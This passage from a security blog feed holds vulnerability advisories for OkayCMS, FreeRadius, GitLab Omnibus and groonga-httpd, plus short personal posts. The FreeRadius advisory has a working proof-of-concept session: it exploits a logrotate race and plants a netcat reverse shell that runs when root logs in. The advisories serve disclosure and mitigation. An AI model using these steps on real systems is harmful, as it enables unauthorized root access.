#000088;">$resp</span> <span style="color: #339933;">=</span> <a href="http://www.php.net/curl_exec"><span style="color: #990000;">curl_exec</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$curl</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #b1b100;">if</span><span style="color: #009900;">&#40;</span><a href="http://www.php.net/curl_error"><span style="color: #990000;">curl_error</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$curl</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span> <span style="color: #009900;">&#123;</span> <span style="color: #b1b100;">print</span> <a href="http://www.php.net/curl_error"><span style="color: #990000;">curl_error</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$curl</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #009900;">&#125;</span> <a href="http://www.php.net/curl_close"><span style="color: #990000;">curl_close</span></a><span style="color: #009900;">&#40;</span><span style="color: #000088;">$curl</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> &nbsp; &nbsp; <span style="color: #b1b100;">print</span> <span style="color: #000088;">$resp</span><span style="color: #339933;">;</span> &nbsp; <span style="color: #000000; font-weight: bold;">?&gt;</span></pre></div> <h4>Notes</h4> <p>Because of the high severity of this vulnerability we will not release a full exploit for the remote code execution.</p> <h4>Vulnerable Versions</h4> <p>All versions of the “Lite”-branch including 2.3.4. Pro Versions prior 3.0.2 might have been affected too.</p> <h4>Tested Versions</h4> <p>OkayCMS-Lite 2.3.4</p> <h4>Impact</h4> <p>An unauthenticated attacker could upload a webshell to the server and execute commands remotely.</p> <h4>Mitigation</h4> <p>At the moment of this publication the vendor has only patched the paid version of the CMS, so a change to other free software or an upgrade to the Pro version of OkayCMS is recommended.</p> <h4>Vendor Contact Timeline</h4> <p>2019-08-29Contacting the vendor</p> <p>2019-09-04Vendor replied</p> <p>2019-09-17Vendor released commercial version 3.0.2 including a bugfix</p> <p>2019-09-29Public disclosure</p> <h4>Advisory URL</h4> <p><a href="https://www.ait.ac.at/ait-sa-20191129-01-unauthenticated-remote-code-execution-okaycms">https://www.ait.ac.at/ait-sa-20191129-01-unauthenticated-remote-code-execution-okaycms</a></p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Dec 02 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/107" hreflang="en">CVE</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/web" hreflang="en">Web</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=284&amp;2=comment&amp;3=comment" token="GjVmaskhE-AMvP5dALObfK4_-KKa7f-L1OICRNPKZFg"></drupal-render-placeholder> </section> Mon, 02 Dec 2019 18:25:19 +0000 Hoti 284 at https://tech.feedyourhead.at https://tech.feedyourhead.at/content/unauthenticated-remote-code-execution-okaycms#comments https://tech.feedyourhead.at/content/unauthenticated-remote-code-execution-okaycms#comments FreeRadius: Privilege Escalation via Logrotate https://tech.feedyourhead.at/content/privilege-escalation-via-logrotate-freeradius <span class="field field--name-title field--type-string field--label-hidden">FreeRadius: Privilege Escalation via Logrotate</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><h2>Identifier: AIT-SA-20191112-01</h2> <p>Target: FreeRadius<br /> Vendor: FreeRadius<br /> Version: all versions including 3.0.19<br /> Fixed in Version: 12.2.3, 12.1.8 and 12.0.8<br /> CVE: <a href="https://nvd.nist.gov/vuln/detail/CVE-2019-10143">CVE-2019-10143</a><br /> Accessibility: Local<br /> Severity: Low<br /> Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)</p> <h4>Summary</h4> <p><a href="https://freeradius.org/">FreeRadius is a modular Open-Source RADIUS suite.</a></p> <h4>Vulnerability Description</h4> <p>The ownership of the logdirectory “radacct” belongs to user "radiusd". User “radiusd” can elevate the privileges to “root” because of an unsafe interaction with logrotate.<br /> User “radiusd” owns the log directory /<em>var/log/radius/radacct:</em></p> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">&nbsp; drwx------. <span style="color: #000000;">3</span> radiusd radiusd <span style="color: #000000;">4096</span> <span style="color: #000000;">26</span>. Apr <span style="color: #000000;">16</span>:01 <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/</span> </pre></div> <p>Log files rotate once a day(or any other frequency if configured) by logrotate as user root. The configuration does not use the “su” directive:</p> <p><div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">&nbsp; <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/*/</span>detail <span style="color: #7a0874; font-weight: bold;">&#123;</span> monthly rotate <span style="color: #000000;">4</span> nocreate missingok compress <span style="color: #7a0874; font-weight: bold;">&#125;</span></pre></div></p> <p>Since logrotate is prone to a race-condition(see <a href="https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition">https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition</a>) it is possible for user "radiusd" to replace the directory /var/log/radius/radacct/logdir with a symbolic link to any directory(for example /etc/bash_completion.d). logrotate will place the compressed files AS ROOT into /etc/bash_completition.d and set the owner and group to "radiusd.radiusd". An attacker could simply place a reverse-shell into this file. As soon as root logs in, a reverse shell will be executed then.</p> <p>Details of the race-condition in logrotate can be found at:</p> <ul> <li><a href="https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition">https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition</a></li> <li><a href="https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges">https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges</a></li> <li><a href="https://github.com/whotwagner/logrotten">https://github.com/whotwagner/logrotten</a></li> </ul> <h4>Proof of Concept</h4> <p>The following example illustrates how an attacker who already gained a shell as user “radiusd”, can elevate his privileges to “root”. After downloading and compiling, the exploit gets executed and waits until the next daily run of logrotate.&nbsp; If the rotation of the log file succeeds, a new file that contains the reverse shell payload, will be written into /etc/bash_completition.d/ with owner “radiusd”. As soon as root logs in, the reverse shell gets executed and opens a shell on the attackers netcat listener:</p> <p>&nbsp;</p> <p><div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;">&nbsp; <span style="color: #666666;">radiusd@redhat7:~$ </span><span style="color: #c20cb9; font-weight: bold;">git clone</span> https:<span style="color: #000000; font-weight: bold;">//</span>github.com<span style="color: #000000; font-weight: bold;">/</span>whotwagner<span style="color: #000000; font-weight: bold;">/</span>logrotten.git <span style="color: #000000; font-weight: bold;">/</span>tmp<span style="color: #000000; font-weight: bold;">/</span>logrotten Cloning into <span style="color: #ff0000;">'/tmp/logrotten'</span>... remote: Enumerating objects: <span style="color: #000000;">84</span>, done. remote: Counting objects: <span style="color: #000000;">100</span><span style="color: #000000; font-weight: bold;">%</span> <span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #000000;">84</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">84</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>, done. remote: Compressing objects: <span style="color: #000000;">100</span><span style="color: #000000; font-weight: bold;">%</span> <span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #000000;">58</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">58</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>, done. remote: Total <span style="color: #000000;">84</span> <span style="color: #7a0874; font-weight: bold;">&#40;</span>delta <span style="color: #000000;">35</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>, reused <span style="color: #000000;">64</span> <span style="color: #7a0874; font-weight: bold;">&#40;</span>delta <span style="color: #000000;">24</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>, pack-reused <span style="color: #000000;">0</span> Unpacking objects: <span style="color: #000000;">100</span><span style="color: #000000; font-weight: bold;">%</span> <span style="color: #7a0874; font-weight: bold;">&#40;</span><span style="color: #000000;">84</span><span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000;">84</span><span style="color: #7a0874; font-weight: bold;">&#41;</span>, done. <span style="color: #666666;">radiusd@redhat7:~$ </span><span style="color: #c20cb9; font-weight: bold;">mkdir</span> <span style="color: #660033;">-p</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/</span>logdir <span style="color: #666666;">radiusd@redhat7:~$ </span><span style="color: #c20cb9; font-weight: bold;">touch</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>detail <span style="color: #666666;">radiusd@redhat7:~$ </span><span style="color: #7a0874; font-weight: bold;">cd</span> <span style="color: #000000; font-weight: bold;">/</span>tmp<span style="color: #000000; font-weight: bold;">/</span>logrotten <span style="color: #000000; font-weight: bold;">&amp;&amp;</span> <span style="color: #c20cb9; font-weight: bold;">gcc</span> <span style="color: #660033;">-o</span> logrotten logrotten.c radiusd<span style="color: #000000; font-weight: bold;">@</span>redhat7:<span style="color: #000000; font-weight: bold;">/</span>tmp<span style="color: #000000; font-weight: bold;">/</span>logrotten$ .<span style="color: #000000; font-weight: bold;">/</span>logrotten <span style="color: #660033;">-c</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>detail Waiting <span style="color: #000000; font-weight: bold;">for</span> rotating <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>detail... Renamed <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>detail with <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>radius<span style="color: #000000; font-weight: bold;">/</span>radacct<span style="color: #000000; font-weight: bold;">/</span>logdir<span style="color: #000000; font-weight: bold;">/</span>detail2 and created symlink to <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>bash_completion.d Done<span style="color: #000000; font-weight: bold;">!</span> radiusd<span style="color: #000000; font-weight: bold;">@</span>redhat7:<span style="color: #000000; font-weight: bold;">/</span>tmp<span style="color: #000000; font-weight: bold;">/</span>logrotten$ <span style="color: #c20cb9; font-weight: bold;">ls</span> <span style="color: #660033;">-l</span> <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>bash_completion.d<span style="color: #000000; font-weight: bold;">/</span> total <span style="color: #000000;">20</span> <span style="color: #660033;">-rw-r--r--</span> <span style="color: #000000;">1</span> root root <span style="color: #000000;">11144</span> Oct <span style="color: #000000;">28</span> <span style="color: #000000;">2018</span> grub <span style="color: #660033;">-rw-r--r--</span> <span style="color: #000000;">1</span> radiusd radiusd <span style="color: #000000;">33</span> May <span style="color: #000000;">12</span> <span style="color: #000000;">18</span>:<span style="color: #000000;">44</span> detail.1.gz radiusd<span style="color: #000000; font-weight: bold;">@</span>redhat7:<span style="color: #000000; font-weight: bold;">/</span>tmp<span style="color: #000000; font-weight: bold;">/</span>logrotten$ <span style="color: #7a0874; font-weight: bold;">echo</span> <span style="color: #ff0000;">&quot;if [ \<span style="color: #780078;">`id -u\`</span> -eq 0 ]; then (/bin/nc -e /bin/bash localhost 3333 &amp;); fi&quot;</span> <span style="color: #000000; font-weight: bold;">&gt;</span> <span style="color: #000000; font-weight: bold;">/</span>etc<span style="color: #000000; font-weight: bold;">/</span>bash_completion.d<span style="color: #000000; font-weight: bold;">/</span>detail.1.gz radiusd<span style="color: #000000; font-weight: bold;">@</span>redhat7:<span style="color: #000000; font-weight: bold;">/</span>tmp<span style="color: #000000; font-weight: bold;">/</span>logrotten$ nc <span style="color: #660033;">-nvlp</span> <span style="color: #000000;">3333</span> listening on <span style="color: #7a0874; font-weight: bold;">&#91;</span>any<span style="color: #7a0874; font-weight: bold;">&#93;</span> <span style="color: #000000;">3333</span> ... connect to <span style="color: #7a0874; font-weight: bold;">&#91;</span>127.0.0.1<span style="color: #7a0874; font-weight: bold;">&#93;</span> from <span style="color: #7a0874; font-weight: bold;">&#40;</span>UNKNOWN<span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #7a0874; font-weight: bold;">&#91;</span>127.0.0.1<span style="color: #7a0874; font-weight: bold;">&#93;</span> <span style="color: #000000;">55526</span> <span style="color: #c20cb9; font-weight: bold;">id</span> <span style="color: #007800;">uid</span>=<span style="color: #000000;">0</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>root<span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #007800;">gid</span>=<span style="color: #000000;">0</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>root<span style="color: #7a0874; font-weight: bold;">&#41;</span> <span style="color: #007800;">groups</span>=<span style="color: #000000;">0</span><span style="color: #7a0874; font-weight: bold;">&#40;</span>root<span style="color: #7a0874; font-weight: bold;">&#41;</span></pre></div></p> <h4>Vulnerable Versions</h4> <p>All versions including 3.0.19</p> <h4>Tested Versions</h4> <p>Name : freeradius<br /> Architecture: x86_64<br /> Version: 3.0.13<br /> Release: 9.el7_5</p> <h4>Impact</h4> <p>An attacker who already achieved a valid shell as user “radiusd” could elevate the privileges to “root”. The fact that another exploit is needed to get a shell lowers the severity from high to low.</p> <h4>Mitigation</h4> <p>Add “su radiusd:radiusd” to all log sections in /etc/logrotate.d/radiusd.<br /> By keeping SELinux in "Enforcing" mode, the “radiusd” user will be limited in the directories he can write to.</p> <h4>References:</h4> <ul> <li><a href="https://access.redhat.com/security/cve/cve-2019-10143">https://access.redhat.com/security/cve/cve-2019-10143</a></li> <li><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-10143">https://nvd.nist.gov/vuln/detail/CVE-2019-10143</a></li> </ul> <h4>Vendor Contact Timeline</h4> <p>2019-05-01Contacting RedHat</p> <p>2019-05-07RedHat opens issue at the vendor bugtracker</p> <p>2019-05-23CVE gets assigned to the issue</p> <p>2019-05-24FreeRadius is skeptical about the “security” impact.</p> <p>2019-11-05Public disclosure</p> <h4>Notes</h4> <p>This CVE is disputed because the vendor <a href="https://freeradius.org/security/">stated</a> that there is no known remote code execution in freeradius that allows an attacker to gain a shell as user “radiusd”.&nbsp; CVE’s are not only assigned for vulnerabilities but also for exposures that allow attacker to have a stronger impact after a successful attack. Therefore we believe that it is important to file this issue as a security related bug.</p> <h4>Advisory URL</h4> <p><a href="https://www.ait.ac.at/ait-sa-20191112-01-privilege-escalation-via-logrotate-in-freeradius">https://www.ait.ac.at/ait-sa-20191112-01-privilege-escalation-via-logrotate-in-freeradius</a></p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Dec 02 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/107" hreflang="en">CVE</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/c" hreflang="en">C</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=283&amp;2=comment&amp;3=comment" token="xzgwb9J5RcAW7IeFIQPIKtSnh-R_KbIEGwnvGSH1LZI"></drupal-render-placeholder> </section> Mon, 02 Dec 2019 18:11:22 +0000 Hoti 283 at https://tech.feedyourhead.at https://tech.feedyourhead.at/content/privilege-escalation-via-logrotate-freeradius#comments https://tech.feedyourhead.at/content/privilege-escalation-via-logrotate-freeradius#comments I "tried harder" and passed another exam https://tech.feedyourhead.at/content/osce <span class="field field--name-title field--type-string field--label-hidden">I &quot;tried harder&quot; and passed another exam</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p><img alt="osce emblem" data-entity-type="file" data-entity-uuid="0c71047f-4663-40f4-989e-5d8fb52257bb" height="88" src="/sites/default/files/inline-images/offsec-student-certified-emblem-rgb-osce.png" width="687" /></p> <p>The <a href="https://www.offensive-security.com/ctp-osce/">"Offensive Security Certified Expert" (OSCE) </a>is earned by passing an extraordinary exam after the "Cracking The Perimeter"-course. <a href="https://tech.feedyourhead.at/content/oscp">The OSCP(Offsensive Security Certified Professional)</a> is strongly focused on pentesting. The OSCE is compared to the OSCP more about writing exploits. Students learn about <a href="https://www.offensive-security.com/documentation/cracking-the-perimeter-syllabus.pdf">exploiting web vulnerabilities, Anti-Virus-evasion, Fuzzing, Buffer Overflows and exploiting network vulnerabilities</a>. After the course I was very proficient in using a debugger like Immunity Debugger or OllyDBG.  The OSCE course is different than the OSCP. In the OSCP you have a big lab to practice and this guides you what you have to learn and figure out by yourself. In the OSCE there are a couple of machines and some exercises. You have to find out by your self how to get a deep understanding of the methods that are used in those exercises.</p> <p>The 48 hour exam was very hard for me. Even though I found some sleep, I really needed most of the time to solve the exercises. In the end I passed the exam on my first attempt. My recommendations for people who want to pass the OSCE are: do the OSCP first because it prepares you for the OSCE. Go through the <a href="https://www.pentesteracademy.com/course?id=3">SLAE32</a> for practicing assembler and shellcoding. During and after the course practice a lot and think about variations of the methods and exploits so that you get a very deep understanding of each course module.</p></div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Nov 10 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/news" hreflang="en">News</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=281&amp;2=comment&amp;3=comment" token="KYveFfDzLjOT9ZYKKKT_YIMdXUoD0_RHvVkJlyx_iqI"></drupal-render-placeholder> </section> Sun, 10 Nov 2019 08:25:47 +0000 Hoti 281 at https://tech.feedyourhead.at https://tech.feedyourhead.at/content/osce#comments https://tech.feedyourhead.at/content/osce#comments Fifth Anniversary https://tech.feedyourhead.at/content/fifth-anniversary <span class="field field--name-title field--type-string field--label-hidden">Fifth Anniversary</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><p>I started this blog five years ago. In the beginning I wrote mostly articles about sysadmin and programming. Now its also filled with security related stuff. It's fascinating for me to have a history of my interests. It's sadly that my spare time got rare and so it happens that I don't write much lately. My intention for the next 5 years is, to be more consequent with writing articles.</p></div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Nov 07 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/98" hreflang="en">Anniversary</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/news" hreflang="en">News</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/blog" hreflang="en">Blog</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=280&amp;2=comment&amp;3=comment" token="ZvQe3feuRZ7o9nFztqK8zp-cdfAlkJ4qLEvCDstioEw"></drupal-render-placeholder> </section> Thu, 07 Nov 2019 08:48:47 +0000 Hoti 280 at https://tech.feedyourhead.at https://tech.feedyourhead.at/content/fifth-anniversary#comments https://tech.feedyourhead.at/content/fifth-anniversary#comments CVE-2019-15741: Privilege Escalation via Logrotate in Gitlab Omnibus https://tech.feedyourhead.at/content/Privilege-Escalation-via-Logrotate-in-Gitlab-Omnibus-CVE-2019-15741 <span class="field field--name-title field--type-string field--label-hidden">CVE-2019-15741: Privilege Escalation via Logrotate in Gitlab Omnibus</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><h3>Overview</h3> <ul><li>Identifier: AIT-SA-20190930-01</li> <li>Target: GitLab Omnibus</li> <li>Vendor: GitLab</li> <li>Version: 7.4 through 12.2.1</li> <li>Fixed in Version: 12.2.3, 12.1.8 and 12.0.8</li> <li>CVE: CVE-2019-15741</li> <li>Accessibility: Local</li> <li>Severity: Low</li> <li>Author: Wolfgang Hotwagner (AIT Austrian Institute of Technology)</li> </ul><h3>Vulnerability Description</h3> <p>GitLab Omnibus sets the ownership of the log directory to the system-user "git", which might let local users obtain root access because of unsafe interaction with logrotate.</p> <h3>Vulnerable Versions</h3> <p>7.4 through 12.2.1</p> <h3>Impact</h3> <p>An attacker who already achieved a valid shell as user “git” could elevate the privileges to “root”. The fact that another exploit is needed to get a shell lowers the severity from high to low.</p> <h3>Advisory URL</h3> <p><a href="http://www.ait.ac.at/ait-sa-20190930-01-privilege-escalation-via-logrotate-in-gitlab-omnibus">http://www.ait.ac.at/ait-sa-20190930-01-privilege-escalation-via-logrotate-in-gitlab-omnibus</a></p> <h3>References:</h3> <ul><li><a href="https://about.gitlab.com/2019/08/29/security-release-gitlab-12-dot-2-dot-3-released/">https://about.gitlab.com/2019/08/29/security-release-gitlab-12-dot-2-dot-3-released/</a> </li> <li><a href="https://gitlab.com/gitlab-org/omnibus-gitlab/issues/4380">https://gitlab.com/gitlab-org/omnibus-gitlab/issues/4380</a> </li> <li><a href="https://hackerone.com/reports/578119">https://hackerone.com/reports/578119</a></li> </ul><p> </p></div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">Oct 04 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/107" hreflang="en">CVE</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/git" hreflang="en">git</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> </div> </div> <section class="field field--name-comment-node-blog field--type-comment field--label-hidden comment-wrapper"> </section> <section class="field field--name-comment field--type-comment field--label-above comment-wrapper"> <h2 class='title comment-form__title'> <i class="fa fa-comments-o"></i> Add new comment</h2> <drupal-render-placeholder callback="comment.lazy_builders:renderForm" arguments="0=node&amp;1=279&amp;2=comment&amp;3=comment" token="tPzTCpXOHPQznS0cKjokuCN09WJl_ncAA7gp79vmOxc"></drupal-render-placeholder> </section> Fri, 04 Oct 2019 11:25:05 +0000 Hoti 279 at https://tech.feedyourhead.at https://tech.feedyourhead.at/content/Privilege-Escalation-via-Logrotate-in-Gitlab-Omnibus-CVE-2019-15741#comments https://tech.feedyourhead.at/content/Privilege-Escalation-via-Logrotate-in-Gitlab-Omnibus-CVE-2019-15741#comments Privilege escalation in groonga-httpd (CVE-2019-11675) https://tech.feedyourhead.at/content/privilege-escalation-in-groonga-httpd <span class="field field--name-title field--type-string field--label-hidden">Privilege escalation in groonga-httpd (CVE-2019-11675)</span> <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item"><h3>Overview</h3> <ul> <li>System affected: Debian packages of groonga/-httpd 6.1.5-1</li> <li>Software-Version: 6.1.5-1</li> <li>User-Interaction: Not required</li> <li>Impact: Local root</li> <li>CVE: CVE-2019-11675</li> </ul> <h3>Detailed Description</h3> <p>The path of the logdirectory of groonga-httpd can be manipulated by user groonga:</p> <pre> <div class="geshifilter"><pre class="bash geshifilter-bash" style="font-family:monospace;"><span style="color: #c20cb9; font-weight: bold;">ls</span> <span style="color: #660033;">-l</span> <span style="color: #000000; font-weight: bold;">/</span>var<span style="color: #000000; font-weight: bold;">/</span>log<span style="color: #000000; font-weight: bold;">/</span>groonga total <span style="color: #000000;">8</span> <span style="color: #660033;">-rw-r--r--</span> <span style="color: #000000;">1</span> root root <span style="color: #000000;">1296</span> Apr <span style="color: #000000;">25</span> <span style="color: #000000;">18</span>:<span style="color: #000000;">44</span> groonga.log drwxr-xr-x <span style="color: #000000;">2</span> groonga groonga <span style="color: #000000;">4096</span> Apr <span style="color: #000000;">25</span> <span style="color: #000000;">18</span>:<span style="color: #000000;">55</span> httpd</pre></div></pre> <p>The files in /var/log/groonga/httpd/*.log are once a day rotated by logrotate as user root with the following config:</p> <pre> /var/log/groonga/httpd/*.log { daily missingok rotate 30 compress delaycompress notifempty create 640 groonga groonga sharedscripts postrotate . /etc/default/groonga-httpd if [ x"$ENABLE" = x"yes" ]; then /usr/bin/curl --silent --output /dev/null \ "http://127.0.0.1:10041/d/log_reopen" fi endscript } </pre> <p>Due to <a href="https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition">logrotate is prone to a race-condition</a> it is possible for user "groonga" to replace the directory /var/log/groonga/httpd with a symbolik link to any directory(for example /etc/bash_completion.d). logrotate will place files AS ROOT into /etc/bash_completition.d and set the owner and group to "groonga.groonga". An attacker could simply place a reverse-shell into this file. As soon as root logs in, a reverse shell will be executed then.</p> <h3>Exploit</h3> <p>A proof-of-concept exploit can be found at <a href="https://github.com/whotwagner/logrotten">https://github.com/whotwagner/logrotten</a></p> <h3>Mitigation</h3> <p>The problem can be mitigated by changing the owner and group of /var/log/groonga to root, or by using the "su option" inside the logrotate-configfile.</p> <h3>Credits</h3> <p>This bug was discovered by Wolfgang Hotwagner(https://tech.feedyourhead.at/content/privilege-escalation-in-groonga-httpd)</p> </div> <span class="field field--name-uid field--type-entity-reference field--label-hidden"><span lang="" about="/users/hoti" typeof="schema:Person" property="schema:name" datatype="">Hoti</span></span> <span class="field field--name-created field--type-created field--label-hidden">May 07 2019</span> <div class="field field--name-field-tagies field--type-entity-reference field--label-above"> <div class="field__label">Tags</div> <div class='field__items'> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/security" hreflang="en">Security</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/taxonomy/term/107" hreflang="en">CVE</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Linux" hreflang="en">Linux</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/sysadmin" hreflang="en">Sysadmin</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/debian" hreflang="en">Debian</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/tags/c" hreflang="en">C</a></div> <div class="field__item"><i class="fa fa-tags"></i> <a href="/Programming" hreflang="en">Programming</a></div> </div> </div> 